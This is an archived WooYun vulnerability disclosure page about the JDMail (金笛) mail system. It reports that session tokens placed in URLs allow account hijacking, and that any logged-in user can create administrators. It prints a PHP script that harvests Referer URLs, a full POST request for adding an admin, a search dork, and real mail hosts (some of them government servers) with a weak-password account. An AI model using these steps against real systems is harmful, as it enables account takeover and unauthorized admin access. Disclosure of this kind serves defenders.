当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062376

漏洞标题:某邮件系统任意用户劫持到添加系统管理员

相关厂商:金笛邮件管理系统

漏洞作者: xfkxfk

提交时间:2014-05-26 14:51

修复时间:2014-08-24 14:52

公开时间:2014-08-24 14:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-26: 细节已通知厂商并且等待厂商处理中
2014-05-30: 厂商已经确认,细节仅向厂商公开
2014-06-02: 细节向第三方安全合作伙伴开放
2014-07-24: 细节向核心白帽子及相关领域专家公开
2014-08-03: 细节向普通白帽子公开
2014-08-13: 细节向实习白帽子公开
2014-08-24: 细节向公众公开

简要描述:

~~

详细说明:

金迪邮件系统,JDMAIL
用户量很大,官方案例:
http://www.mailer.com.cn/Products6.html
http://www.mailer.com.cn/New%20Customers/index1.htm
利用证明:
关键字:
intitle:金笛邮件管理系统
http://mail.lyx928.com:8080
http://mail.njzj.gov.cn:8080
http://mail.shszx.gov.cn:8600
......
此邮件系统存在多处设计缺陷高危漏洞。

漏洞证明:

0x001 任意用户劫持
此邮件系统,在登陆后url中有一个8或者9位的字符串,如45e22a8H7
这个字符串就是登陆的凭证,当登录后,只要拿到这个字符串就可以直接登陆此用户名,没有session和cookie的验证。
意思就是说我们获取到登陆后的url,只要此用户名没有注销登陆出的话,直接就能利用此url直接登陆系统。
利用方式很简单,给任意用户发一个email,email的内容中加载一个超链接,诱使用户点击此链接,此链接在后端抓取此次请求的Referer即可,此时你就可以得到他的url,也就劫持了用户。
更直接的给管理员发送恶意邮件即可劫持之。
或者通过XSS悄无声息的劫持任意用户账号。
这里我们拿http://mail.lyx928.com:8080进行测试。
用户[email protected],弱口令111111
登陆之,然后我们给此用户发送邮件:

1.png


内容中加入了超链接:

2.png


此超链接的内容为:

<?php
file_put_contents("referer.txt",  " ref:".$_SERVER["HTTP_REFERER"], FILE_APPEND);  
file_put_contents("referer.txt",  " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); 
file_put_contents("referer.txt",  " Time:".date("Y.m.d H:i:s")."\r\n",FILE_APPEND); 
?>


获取Referer的内容到referer.txt中
[email protected]点击此链接后,看看我们获取到的Referer内容:

3.png


成功获取了Referer,以及url中的认证字符串。
我们换一个浏览器访问此url即可,看是否成功登陆:

4.png


成功登陆劫持到的用户,很Easy!
0x002 添加管理员
这里存在越权操作我们登录普通用户后,可以直接添加一个管理员用户:

链接:http://mail.lyx928.com:8080/tmw/45e22a8H7/mailmain?type=msaveuser
POST:subtype=new&username=test123&domain=dodole.net&usertype=S&departmentid=&first_name=test123&password=111111&encodetype=inner&enable=true&enable_smtp=true&enable_pop3=true&enable_imap4=true&enable_webaccess=true&alias=&expiredtime=&max_mailbox_size=-1&max_mailbox_msgs=-1&fm_size=-1&fm_upload_size=-2&sendmail_freq=&sendsms_freq=&sendmms_freq=&wm_max_attachment_size=&default_language=SIMPLIFIED_CHINESE&telephone=&mobile=&postalcode=&country=&state_province=&city=&organization=&department=&address=


添加一个[email protected]的管理员用户

5.png

修复方案:

1、加强用户登陆状态验证
2、严格控制用户权限

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-30 17:19

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开联系渠道向软件生产厂商通报,电话(李文霞),将通报发送至和邮箱中处置。

最新状态:

暂无